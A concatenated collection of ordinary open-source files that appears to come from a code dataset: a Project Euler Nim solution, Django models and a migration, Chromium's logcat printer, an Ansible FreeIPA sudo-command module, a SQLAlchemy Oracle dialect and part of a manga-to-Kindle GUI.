- non-zero if, with perfect strategy, the player about
to move will eventually win.
For example X(1,2,3) = 0 because, no matter what the current player does,
the opponent can respond with a move that leaves two heaps of equal size,
at which point every move by the current player can be mirrored by the
opponent until no stones remain; so the current player loses. To illustrate:
- current player moves to (1,2,1)
- opponent moves to (1,0,1)
- current player moves to (0,0,1)
- opponent moves to (0,0,0), and so wins.
For how many positive integers n <= 2^30 does X(n,2n,3n) = 0?
"""
def solution(exponent: int = 30) -> int:
"""
For any given exponent x >= 0, 1 <= n <= 2^x.
This function returns how many Nim games are lost given that
each Nim game has three heaps of the form (n, 2*n, 3*n).
>>> solution(0)
1
>>> solution(2)
3
>>> solution(10)
144
"""
# To find how many total games were lost for a given exponent x,
# we need to find the Fibonacci number F(x+2).
fibonacci_index = exponent + 2
phi = (1 + 5 ** 0.5) / 2
fibonacci = (phi ** fibonacci_index - (phi - 1) ** fibonacci_index) / 5 ** 0.5
return int(fibonacci)
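# A brute-force cross-check (sketch, not part of the original solution):
# for three heaps, the player to move loses exactly when the nim-sum is
# zero, i.e. X(n1, n2, n3) = n1 ^ n2 ^ n3, so losing positions of the form
# (n, 2n, 3n) can be counted directly for small exponents.
def brute_force(exponent: int = 10) -> int:
    """
    Count n with 1 <= n <= 2^exponent where n ^ (2*n) ^ (3*n) == 0.
    >>> brute_force(10) == solution(10)
    True
    """
    return sum(1 for n in range(1, 2 ** exponent + 1) if n ^ (2 * n) ^ (3 * n) == 0)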
if __name__ == "__main__":
print(f"{solution() = }")
|
jgoclawski/django
|
refs/heads/master
|
tests/max_lengths/models.py
|
438
|
from django.db import models
class PersonWithDefaultMaxLengths(models.Model):
email = models.EmailField()
vcard = models.FileField(upload_to='/tmp')
homepage = models.URLField()
avatar = models.FilePathField()
class PersonWithCustomMaxLengths(models.Model):
email = models.EmailField(max_length=250)
vcard = models.FileField(upload_to='/tmp', max_length=250)
homepage = models.URLField(max_length=250)
avatar = models.FilePathField(max_length=250)
|
philgyford/django-spectator
|
refs/heads/main
|
spectator/events/migrations/0011_auto_20180125_1348.py
|
1
|
# Generated by Django 2.0 on 2018-01-25 13:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("spectator_events", "0010_auto_20180118_0906"),
]
operations = [
migrations.AlterModelOptions(
name="classicalwork",
options={"ordering": ("title_sort",), "verbose_name": "classical work"},
),
migrations.AlterModelOptions(
name="classicalworkrole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "classical work role",
},
),
migrations.AlterModelOptions(
name="dancepiece",
options={"ordering": ("title_sort",), "verbose_name": "dance piece"},
),
migrations.AlterModelOptions(
name="dancepiecerole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "dance piece role",
},
),
migrations.AlterModelOptions(
name="eventrole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "event role",
},
),
migrations.AlterModelOptions(
name="movierole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "movie role",
},
),
migrations.AlterModelOptions(
name="playrole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "play role",
},
),
]
|
laperry1/android_external_chromium_org
|
refs/heads/cm-12.1
|
build/android/adb_logcat_printer.py
|
44
|
#!/usr/bin/env python
#
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shutdown adb_logcat_monitor and print accumulated logs.
To test, call './adb_logcat_printer.py <base_dir>' where
<base_dir> contains 'adb logcat -v threadtime' files named as
logcat_<deviceID>_<sequenceNum>
The script will print the files to out, and will combine multiple
logcats from a single device if there is overlap.
Additionally, if a <base_dir>/LOGCAT_MONITOR_PID exists, the script
will attempt to terminate the contained PID by sending a SIGTERM and
monitoring for the deletion of the aforementioned file.
"""
# pylint: disable=W0702
import cStringIO
import logging
import optparse
import os
import re
import signal
import sys
import time
# Set this to debug for more verbose output
LOG_LEVEL = logging.INFO
def CombineLogFiles(list_of_lists, logger):
"""Splices together multiple logcats from the same device.
Args:
list_of_lists: list of pairs (filename, list of timestamped lines)
logger: handler to log events
Returns:
list of lines with duplicates removed
"""
cur_device_log = ['']
for cur_file, cur_file_lines in list_of_lists:
# Ignore files with just the logcat header
if len(cur_file_lines) < 2:
continue
common_index = 0
# Skip this step if list just has empty string
if len(cur_device_log) > 1:
try:
line = cur_device_log[-1]
# Used to make sure we only splice on a timestamped line
if re.match(r'^\d{2}-\d{2} \d{2}:\d{2}:\d{2}.\d{3} ', line):
common_index = cur_file_lines.index(line)
else:
logger.warning('splice error - no timestamp in "%s"?', line.strip())
except ValueError:
# The last line was valid but wasn't found in the next file
cur_device_log += ['***** POSSIBLE INCOMPLETE LOGCAT *****']
logger.info('Unable to splice %s. Incomplete logcat?', cur_file)
cur_device_log += ['*'*30 + ' %s' % cur_file]
cur_device_log.extend(cur_file_lines[common_index:])
return cur_device_log
def FindLogFiles(base_dir):
"""Search a directory for logcat files.
Args:
base_dir: directory to search
Returns:
Mapping of device_id to a sorted list of file paths for a given device
"""
logcat_filter = re.compile(r'^logcat_(\w+)_(\d+)$')
# list of tuples (<device_id>, <seq num>, <full file path>)
filtered_list = []
for cur_file in os.listdir(base_dir):
matcher = logcat_filter.match(cur_file)
if matcher:
filtered_list += [(matcher.group(1), int(matcher.group(2)),
os.path.join(base_dir, cur_file))]
filtered_list.sort()
file_map = {}
for device_id, _, cur_file in filtered_list:
if device_id not in file_map:
file_map[device_id] = []
file_map[device_id] += [cur_file]
return file_map
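# Illustrative result (hypothetical file names): a base_dir containing
# logcat_AB324_0 and logcat_AB324_1 yields
# {'AB324': [<base_dir>/logcat_AB324_0, <base_dir>/logcat_AB324_1]}.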
def GetDeviceLogs(log_filenames, logger):
"""Read log files, combine and format.
Args:
log_filenames: mapping of device_id to sorted list of file paths
logger: logger handle for logging events
Returns:
list of formatted device logs, one for each device.
"""
device_logs = []
for device, device_files in log_filenames.iteritems():
logger.debug('%s: %s', device, str(device_files))
device_file_lines = []
for cur_file in device_files:
with open(cur_file) as f:
device_file_lines += [(cur_file, f.read().splitlines())]
combined_lines = CombineLogFiles(device_file_lines, logger)
# Prepend each line with a short unique ID so it's easy to see
# when the device changes. We don't use the start of the device
# ID because it can be the same among devices. Example lines:
# AB324: foo
# AB324: blah
device_logs += [('\n' + device[-5:] + ': ').join(combined_lines)]
return device_logs
def ShutdownLogcatMonitor(base_dir, logger):
"""Attempts to shutdown adb_logcat_monitor and blocks while waiting."""
try:
monitor_pid_path = os.path.join(base_dir, 'LOGCAT_MONITOR_PID')
with open(monitor_pid_path) as f:
monitor_pid = int(f.readline())
logger.info('Sending SIGTERM to %d', monitor_pid)
os.kill(monitor_pid, signal.SIGTERM)
i = 0
while True:
time.sleep(.2)
if not os.path.exists(monitor_pid_path):
return
if not os.path.exists('/proc/%d' % monitor_pid):
logger.warning('Monitor (pid %d) terminated uncleanly?', monitor_pid)
return
logger.info('Waiting for logcat process to terminate.')
i += 1
if i >= 10:
logger.warning('Monitor pid did not terminate. Continuing anyway.')
return
except (ValueError, IOError, OSError):
logger.exception('Error signaling logcat monitor - continuing')
def main(argv):
parser = optparse.OptionParser(usage='Usage: %prog [options] <log dir>')
parser.add_option('--output-path',
help='Output file path (if unspecified, prints to stdout)')
options, args = parser.parse_args(argv)
if len(args) != 1:
parser.error('Wrong number of unparsed args')
base_dir = args[0]
if options.output_path:
output_file = open(options.output_path, 'w')
else:
output_file = sys.stdout
log_stringio = cStringIO.StringIO()
logger = logging.getLogger('LogcatPrinter')
logger.setLevel(LOG_LEVEL)
sh = logging.StreamHandler(log_stringio)
sh.setFormatter(logging.Formatter('%(asctime)-2s %(levelname)-8s'
' %(message)s'))
logger.addHandler(sh)
try:
# Wait at least 5 seconds after base_dir is created before printing.
#
# The idea is that 'adb logcat > file' output consists of 2 phases:
# 1 Dump all the saved logs to the file
# 2 Stream log messages as they are generated
#
# We want to give enough time for phase 1 to complete. There's no
# good method to tell how long to wait, but it usually only takes a
# second. On most bots, this code path won't occur at all, since
# adb_logcat_monitor.py command will have been spawned more than 5 seconds
# before this script is called.
try:
sleep_time = 5 - (time.time() - os.path.getctime(base_dir))
except OSError:
sleep_time = 5
if sleep_time > 0:
logger.warning('Monitor just started? Sleeping %.1fs', sleep_time)
time.sleep(sleep_time)
assert os.path.exists(base_dir), '%s does not exist' % base_dir
ShutdownLogcatMonitor(base_dir, logger)
separator = '\n' + '*' * 80 + '\n\n'
for log in GetDeviceLogs(FindLogFiles(base_dir), logger):
output_file.write(log)
output_file.write(separator)
with open(os.path.join(base_dir, 'eventlog')) as f:
output_file.write('\nLogcat Monitor Event Log\n')
output_file.write(f.read())
except:
logger.exception('Unexpected exception')
logger.info('Done.')
sh.flush()
output_file.write('\nLogcat Printer Event Log\n')
output_file.write(log_stringio.getvalue())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
TheoRettisch/p2pool-giarcoin
|
refs/heads/master
|
wstools/tests/test_wstools.py
|
308
|
#!/usr/bin/env python
############################################################################
# Joshua R. Boverhof, David W. Robertson, LBNL
# See LBNLCopyright for copyright notice!
###########################################################################
import unittest, tarfile, os, ConfigParser
import test_wsdl
SECTION='files'
CONFIG_FILE = 'config.txt'
def extractFiles(section, option):
config = ConfigParser.ConfigParser()
config.read(CONFIG_FILE)
archives = config.get(section, option)
archives = eval(archives)
for file in archives:
tar = tarfile.open(file)
if not os.access(tar.getnames()[0], os.R_OK):
for i in tar.getnames():
tar.extract(i)
def makeTestSuite():
suite = unittest.TestSuite()
suite.addTest(test_wsdl.makeTestSuite("services_by_file"))
return suite
def main():
extractFiles(SECTION, 'archives')
unittest.main(defaultTest="makeTestSuite")
if __name__ == "__main__" : main()
|
tchernomax/ansible
|
refs/heads/devel
|
lib/ansible/modules/identity/ipa/ipa_sudocmd.py
|
74
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipa_sudocmd
author: Thomas Krahn (@Nosmoht)
short_description: Manage FreeIPA sudo command
description:
- Add, modify or delete sudo command within FreeIPA server using FreeIPA API.
options:
sudocmd:
description:
- Sudo Command.
aliases: ['name']
required: true
description:
description:
- A description of this command.
state:
description: State to ensure
default: present
choices: ['present', 'absent', 'enabled', 'disabled']
extends_documentation_fragment: ipa.documentation
version_added: "2.3"
'''
EXAMPLES = '''
# Ensure sudo command exists
- ipa_sudocmd:
name: su
description: Allow to run su via sudo
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure sudo command does not exist
- ipa_sudocmd:
name: su
state: absent
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
'''
RETURN = '''
sudocmd:
description: Sudo command as return from IPA API
returned: always
type: dict
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ipa import IPAClient, ipa_argument_spec
from ansible.module_utils._text import to_native
class SudoCmdIPAClient(IPAClient):
def __init__(self, module, host, port, protocol):
super(SudoCmdIPAClient, self).__init__(module, host, port, protocol)
def sudocmd_find(self, name):
return self._post_json(method='sudocmd_find', name=None, item={'all': True, 'sudocmd': name})
def sudocmd_add(self, name, item):
return self._post_json(method='sudocmd_add', name=name, item=item)
def sudocmd_mod(self, name, item):
return self._post_json(method='sudocmd_mod', name=name, item=item)
def sudocmd_del(self, name):
return self._post_json(method='sudocmd_del', name=name)
def get_sudocmd_dict(description=None):
data = {}
if description is not None:
data['description'] = description
return data
def get_sudocmd_diff(client, ipa_sudocmd, module_sudocmd):
return client.get_diff(ipa_data=ipa_sudocmd, module_data=module_sudocmd)
def ensure(module, client):
name = module.params['sudocmd']
state = module.params['state']
module_sudocmd = get_sudocmd_dict(description=module.params['description'])
ipa_sudocmd = client.sudocmd_find(name=name)
changed = False
if state == 'present':
if not ipa_sudocmd:
changed = True
if not module.check_mode:
client.sudocmd_add(name=name, item=module_sudocmd)
else:
diff = get_sudocmd_diff(client, ipa_sudocmd, module_sudocmd)
if len(diff) > 0:
changed = True
if not module.check_mode:
data = {}
for key in diff:
data[key] = module_sudocmd.get(key)
client.sudocmd_mod(name=name, item=data)
else:
if ipa_sudocmd:
changed = True
if not module.check_mode:
client.sudocmd_del(name=name)
return changed, client.sudocmd_find(name=name)
def main():
argument_spec = ipa_argument_spec()
argument_spec.update(description=dict(type='str'),
state=dict(type='str', default='present', choices=['present', 'absent', 'enabled', 'disabled']),
sudocmd=dict(type='str', required=True, aliases=['name']))
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
client = SudoCmdIPAClient(module=module,
host=module.params['ipa_host'],
port=module.params['ipa_port'],
protocol=module.params['ipa_prot'])
try:
client.login(username=module.params['ipa_user'],
password=module.params['ipa_pass'])
changed, sudocmd = ensure(module, client)
module.exit_json(changed=changed, sudocmd=sudocmd)
except Exception as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
|
trmznt/plasmogen
|
refs/heads/master
|
setup.py
|
1
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.md')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.md')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_chameleon',
'pyramid_debugtoolbar',
'waitress',
'genaf'
]
setup(name='plasmogen',
version='0.01',
description='plasmogen',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web pyramid pylons plasmodium genotype',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="plasmogen",
entry_points="""\
[paste.app_factory]
main = plasmogen:main
[console_scripts]
plasmogen-run = plasmogen.scripts.run:main
""",
)
|
kecheon/yablist
|
refs/heads/master
|
simpletext/views.py
|
6027
|
# Create your views here.
|
marcuskelly/recover
|
refs/heads/master
|
Lib/site-packages/sqlalchemy/dialects/oracle/zxjdbc.py
|
33
|
# oracle/zxjdbc.py
# Copyright (C) 2005-2017 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: oracle+zxjdbc
:name: zxJDBC for Jython
:dbapi: zxjdbc
:connectstring: oracle+zxjdbc://user:pass@host/dbname
:driverurl: http://www.oracle.com/technetwork/database/features/jdbc/index-091264.html
.. note:: Jython is not supported by current versions of SQLAlchemy. The
zxjdbc dialect should be considered experimental.
"""
import decimal
import re
from sqlalchemy import sql, types as sqltypes, util
from sqlalchemy.connectors.zxJDBC import ZxJDBCConnector
from sqlalchemy.dialects.oracle.base import (OracleCompiler,
OracleDialect,
OracleExecutionContext)
from sqlalchemy.engine import result as _result
from sqlalchemy.sql import expression
import collections
SQLException = zxJDBC = None
class _ZxJDBCDate(sqltypes.Date):
def result_processor(self, dialect, coltype):
def process(value):
if value is None:
return None
else:
return value.date()
return process
class _ZxJDBCNumeric(sqltypes.Numeric):
def result_processor(self, dialect, coltype):
# XXX: does the dialect return Decimal or not???
# if it does (in all cases), we could use a None processor as well as
# the to_float generic processor
if self.asdecimal:
def process(value):
if isinstance(value, decimal.Decimal):
return value
else:
return decimal.Decimal(str(value))
else:
def process(value):
if isinstance(value, decimal.Decimal):
return float(value)
else:
return value
return process
class OracleCompiler_zxjdbc(OracleCompiler):
def returning_clause(self, stmt, returning_cols):
self.returning_cols = list(
expression._select_iterables(returning_cols))
# within_columns_clause=False so that labels (foo AS bar) don't render
columns = [self.process(c, within_columns_clause=False)
for c in self.returning_cols]
if not hasattr(self, 'returning_parameters'):
self.returning_parameters = []
binds = []
for i, col in enumerate(self.returning_cols):
dbtype = col.type.dialect_impl(
self.dialect).get_dbapi_type(self.dialect.dbapi)
self.returning_parameters.append((i + 1, dbtype))
bindparam = sql.bindparam(
"ret_%d" % i, value=ReturningParam(dbtype))
self.binds[bindparam.key] = bindparam
binds.append(
self.bindparam_string(self._truncate_bindparam(bindparam)))
return 'RETURNING ' + ', '.join(columns) + " INTO " + ", ".join(binds)
class OracleExecutionContext_zxjdbc(OracleExecutionContext):
def pre_exec(self):
if hasattr(self.compiled, 'returning_parameters'):
# prepare a zxJDBC statement so we can grab its underlying
# OraclePreparedStatement's getReturnResultSet later
self.statement = self.cursor.prepare(self.statement)
def get_result_proxy(self):
if hasattr(self.compiled, 'returning_parameters'):
rrs = None
try:
try:
rrs = self.statement.__statement__.getReturnResultSet()
next(rrs)
except SQLException as sqle:
msg = '%s [SQLCode: %d]' % (
sqle.getMessage(), sqle.getErrorCode())
if sqle.getSQLState() is not None:
msg += ' [SQLState: %s]' % sqle.getSQLState()
raise zxJDBC.Error(msg)
else:
row = tuple(
self.cursor.datahandler.getPyObject(
rrs, index, dbtype)
for index, dbtype in
self.compiled.returning_parameters)
return ReturningResultProxy(self, row)
finally:
if rrs is not None:
try:
rrs.close()
except SQLException:
pass
self.statement.close()
return _result.ResultProxy(self)
def create_cursor(self):
cursor = self._dbapi_connection.cursor()
cursor.datahandler = self.dialect.DataHandler(cursor.datahandler)
return cursor
class ReturningResultProxy(_result.FullyBufferedResultProxy):
"""ResultProxy backed by the RETURNING ResultSet results."""
def __init__(self, context, returning_row):
self._returning_row = returning_row
super(ReturningResultProxy, self).__init__(context)
def _cursor_description(self):
ret = []
for c in self.context.compiled.returning_cols:
if hasattr(c, 'name'):
ret.append((c.name, c.type))
else:
ret.append((c.anon_label, c.type))
return ret
def _buffer_rows(self):
return collections.deque([self._returning_row])
class ReturningParam(object):
"""A bindparam value representing a RETURNING parameter.
Specially handled by OracleReturningDataHandler.
"""
def __init__(self, type):
self.type = type
def __eq__(self, other):
if isinstance(other, ReturningParam):
return self.type == other.type
return NotImplemented
def __ne__(self, other):
if isinstance(other, ReturningParam):
return self.type != other.type
return NotImplemented
def __repr__(self):
kls = self.__class__
return '<%s.%s object at 0x%x type=%s>' % (
kls.__module__, kls.__name__, id(self), self.type)
class OracleDialect_zxjdbc(ZxJDBCConnector, OracleDialect):
jdbc_db_name = 'oracle'
jdbc_driver_name = 'oracle.jdbc.OracleDriver'
statement_compiler = OracleCompiler_zxjdbc
execution_ctx_cls = OracleExecutionContext_zxjdbc
colspecs = util.update_copy(
OracleDialect.colspecs,
{
sqltypes.Date: _ZxJDBCDate,
sqltypes.Numeric: _ZxJDBCNumeric
}
)
def __init__(self, *args, **kwargs):
super(OracleDialect_zxjdbc, self).__init__(*args, **kwargs)
global SQLException, zxJDBC
from java.sql import SQLException
from com.ziclix.python.sql import zxJDBC
from com.ziclix.python.sql.handler import OracleDataHandler
class OracleReturningDataHandler(OracleDataHandler):
"""zxJDBC DataHandler that specially handles ReturningParam."""
def setJDBCObject(self, statement, index, object, dbtype=None):
if type(object) is ReturningParam:
statement.registerReturnParameter(index, object.type)
elif dbtype is None:
OracleDataHandler.setJDBCObject(
self, statement, index, object)
else:
OracleDataHandler.setJDBCObject(
self, statement, index, object, dbtype)
self.DataHandler = OracleReturningDataHandler
def initialize(self, connection):
super(OracleDialect_zxjdbc, self).initialize(connection)
self.implicit_returning = \
connection.connection.driverversion >= '10.2'
def _create_jdbc_url(self, url):
return 'jdbc:oracle:thin:@%s:%s:%s' % (
url.host, url.port or 1521, url.database)
def _get_server_version_info(self, connection):
version = re.search(
r'Release ([\d\.]+)', connection.connection.dbversion).group(1)
return tuple(int(x) for x in version.split('.'))
dialect = OracleDialect_zxjdbc
|
BlackDragonHunt/Mangle
|
refs/heads/master
|
book.py
|
1
|
# Copyright (C) 2010 Alex Yatskov
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from PyQt4 import QtGui, QtCore, QtXml
import image
from image import ImageFlags
from about import DialogAbout
from options import DialogOptions
from convert import DialogConvert
from ui.book_ui import Ui_MainWindowBook
class Book:
DefaultDevice = 'Kindle 3'
DefaultOverwrite = True
DefaultCBZ = False
DefaultImageFlags = ImageFlags.Orient | ImageFlags.Shrink | ImageFlags.Quantize
DefaultsXML = 'defaults.xml'
def __init__(self):
self.images = []
self.filename = None
self.modified = False
self.title = None
self.load_defaults(Book.DefaultsXML)
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Saves the current settings as the defaults.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def save_defaults(self, filename = DefaultsXML):
document = QtXml.QDomDocument()
root = document.createElement('defaults')
document.appendChild(root)
root.setAttribute('overwrite', 'true' if self.overwrite else 'false')
root.setAttribute('device', self.device)
root.setAttribute('orientImages', 'true' if self.imageFlags & ImageFlags.Orient else 'false')
root.setAttribute('shrinkImages', 'true' if self.imageFlags & ImageFlags.Shrink else 'false')
root.setAttribute('frameImages', 'true' if self.imageFlags & ImageFlags.Frame else 'false')
root.setAttribute('ditherImages', 'true' if self.imageFlags & ImageFlags.Quantize else 'false')
root.setAttribute('enlargeImages', 'true' if self.imageFlags & ImageFlags.Enlarge else 'false')
root.setAttribute('splitImages', 'true' if self.imageFlags & ImageFlags.Split else 'false')
root.setAttribute('rightToLeft', 'true' if self.imageFlags & ImageFlags.RightToLeft else 'false')
root.setAttribute('cbz', 'true' if self.cbz else 'false')
textXml = document.toString(4).toUtf8()
try:
fileXml = open(unicode(filename), 'w')
fileXml.write(textXml)
fileXml.close()
except IOError:
raise RuntimeError('Cannot create defaults file %s' % filename)
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Loads the default settings from a file.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def load_defaults(self, filename = DefaultsXML):
try:
fileXml = open(unicode(filename), 'r')
textXml = fileXml.read()
fileXml.close()
except IOError:
self.device = Book.DefaultDevice
self.overwrite = Book.DefaultOverwrite
self.imageFlags = Book.DefaultImageFlags
self.cbz = Book.DefaultCBZ
self.save_defaults(filename)
return
document = QtXml.QDomDocument()
if not document.setContent(QtCore.QString.fromUtf8(textXml)):
raise RuntimeError('Error parsing defaults file %s' % filename)
root = document.documentElement()
if root.tagName() != 'defaults':
raise RuntimeError('Unexpected defaults format in file %s' % filename)
self.overwrite = root.attribute('overwrite', 'true' if Book.DefaultOverwrite else 'false') == 'true'
self.device = root.attribute('device', Book.DefaultDevice)
orient = root.attribute('orientImages', 'true' if Book.DefaultImageFlags & ImageFlags.Orient else 'false') == 'true'
split = root.attribute('splitImages', 'true' if Book.DefaultImageFlags & ImageFlags.Split else 'false') == 'true'
shrink = root.attribute('shrinkImages', 'true' if Book.DefaultImageFlags & ImageFlags.Shrink else 'false') == 'true'
enlarge = root.attribute('enlargeImages', 'true' if Book.DefaultImageFlags & ImageFlags.Enlarge else 'false') == 'true'
frame = root.attribute('frameImages', 'true' if Book.DefaultImageFlags & ImageFlags.Frame else 'false') == 'true'
dither = root.attribute('ditherImages', 'true' if Book.DefaultImageFlags & ImageFlags.Quantize else 'false') == 'true'
rtl = root.attribute('rightToLeft', 'true' if Book.DefaultImageFlags & ImageFlags.RightToLeft else 'false') == 'true'
self.imageFlags = (
(ImageFlags.Orient if orient else 0) |
(ImageFlags.Split if split else 0) |
(ImageFlags.Shrink if shrink else 0) |
(ImageFlags.Enlarge if enlarge else 0) |
(ImageFlags.Frame if frame else 0) |
(ImageFlags.Quantize if dither else 0) |
(ImageFlags.RightToLeft if rtl else 0)
)
self.cbz = root.attribute('cbz', 'true' if Book.DefaultCBZ else 'false') == 'true'
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Saves the current state to a book file.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def save(self, filename):
document = QtXml.QDomDocument()
root = document.createElement('book')
document.appendChild(root)
root.setAttribute('title', self.title)
root.setAttribute('overwrite', 'true' if self.overwrite else 'false')
root.setAttribute('device', self.device)
root.setAttribute('imageFlags', self.imageFlags)
root.setAttribute('cbz', 'true' if self.cbz else 'false')
for filenameImg in self.images:
itemImg = document.createElement('image')
root.appendChild(itemImg)
itemImg.setAttribute('filename', filenameImg)
textXml = document.toString(4).toUtf8()
try:
fileXml = open(unicode(filename), 'w')
fileXml.write(textXml)
fileXml.close()
except IOError:
raise RuntimeError('Cannot create book file %s' % filename)
self.filename = filename
self.modified = False
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Loads a book file.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def load(self, filename):
try:
fileXml = open(unicode(filename), 'r')
textXml = fileXml.read()
fileXml.close()
except IOError:
raise RuntimeError('Cannot open book file %s' % filename)
document = QtXml.QDomDocument()
if not document.setContent(QtCore.QString.fromUtf8(textXml)):
raise RuntimeError('Error parsing book file %s' % filename)
root = document.documentElement()
if root.tagName() != 'book':
raise RuntimeError('Unexpected book format in file %s' % filename)
self.title = root.attribute('title', 'Untitled')
self.overwrite = root.attribute('overwrite', 'true' if Book.DefaultOverwrite else 'false') == 'true'
self.device = root.attribute('device', Book.DefaultDevice)
self.imageFlags = int(root.attribute('imageFlags', str(Book.DefaultImageFlags)))
self.cbz = root.attribute('cbz', 'true' if Book.DefaultCBZ else 'false') == 'true'
self.filename = filename
self.modified = False
self.images = []
items = root.elementsByTagName('image')
if items == None:
return
for i in xrange(0, len(items)):
item = items.at(i).toElement()
if item.hasAttribute('filename'):
self.images.append(item.attribute('filename'))
class MainWindowBook(QtGui.QMainWindow, Ui_MainWindowBook):
def __init__(self, filename=None):
QtGui.QMainWindow.__init__(self)
self.setupUi(self)
self.connect(self.actionFileNew, QtCore.SIGNAL('triggered()'), self.onFileNew)
self.connect(self.actionFileOpen, QtCore.SIGNAL('triggered()'), self.onFileOpen)
self.connect(self.actionFileSave, QtCore.SIGNAL('triggered()'), self.onFileSave)
self.connect(self.actionFileSaveAs, QtCore.SIGNAL('triggered()'), self.onFileSaveAs)
self.connect(self.actionBookOptions, QtCore.SIGNAL('triggered()'), self.onBookOptions)
self.connect(self.actionBookAddFiles, QtCore.SIGNAL('triggered()'), self.onBookAddFiles)
self.connect(self.actionBookAddDirectory, QtCore.SIGNAL('triggered()'), self.onBookAddDirectory)
self.connect(self.actionBookShiftUp, QtCore.SIGNAL('triggered()'), self.onBookShiftUp)
self.connect(self.actionBookShiftDown, QtCore.SIGNAL('triggered()'), self.onBookShiftDown)
self.connect(self.actionBookRemove, QtCore.SIGNAL('triggered()'), self.onBookRemove)
self.connect(self.actionBookExport, QtCore.SIGNAL('triggered()'), self.onBookExport)
self.connect(self.actionHelpAbout, QtCore.SIGNAL('triggered()'), self.onHelpAbout)
self.connect(self.actionHelpHomepage, QtCore.SIGNAL('triggered()'), self.onHelpHomepage)
self.connect(self.listWidgetFiles, QtCore.SIGNAL('customContextMenuRequested(const QPoint&)'), self.onFilesContextMenu)
self.connect(self.listWidgetFiles, QtCore.SIGNAL('itemDoubleClicked (QListWidgetItem *)'), self.onFilesDoubleClick)
self.listWidgetFiles.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.book = Book()
if filename != None:
self.loadBook(filename)
self.current_dir = os.getcwd()
def closeEvent(self, event):
if not self.saveIfNeeded():
event.ignore()
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.acceptProposedAction()
def dropEvent(self, event):
directories = []
filenames = []
for url in event.mimeData().urls():
filename = url.toLocalFile()
if self.isImageFile(filename):
filenames.append(filename)
elif os.path.isdir(unicode(filename)):
directories.append(filename)
self.addImageDirs(directories)
self.addImageFiles(filenames)
def onFileNew(self):
if self.saveIfNeeded():
self.book = Book()
self.listWidgetFiles.clear()
def onFileOpen(self):
if not self.saveIfNeeded():
return
filename = QtGui.QFileDialog.getOpenFileName(
self,
'Select a book file to open',
self.current_dir,
'Mangle files (*.mngl);;All files (*.*)'
)
if not filename.isNull():
self.loadBook(self.cleanupBookFile(filename))
# Keep track of wherever they moved to find this file.
self.current_dir = os.path.split(str(filename))[0]
def onFileSave(self):
self.saveBook(False)
def onFileSaveAs(self):
self.saveBook(True)
def onFilesContextMenu(self, point):
menu = QtGui.QMenu(self)
menu.addAction(self.menu_Add.menuAction())
if len(self.listWidgetFiles.selectedItems()) > 0:
menu.addAction(self.menu_Shift.menuAction())
menu.addAction(self.actionBookRemove)
menu.exec_(self.listWidgetFiles.mapToGlobal(point))
def onFilesDoubleClick(self, item):
services = QtGui.QDesktopServices()
services.openUrl(QtCore.QUrl.fromLocalFile(item.text()))
def onBookAddFiles(self):
filenames = QtGui.QFileDialog.getOpenFileNames(
self,
'Select image file(s) to add',
self.current_dir,
'Image files (*.jpeg *.jpg *.gif *.png);;All files (*.*)'
)
if filenames:
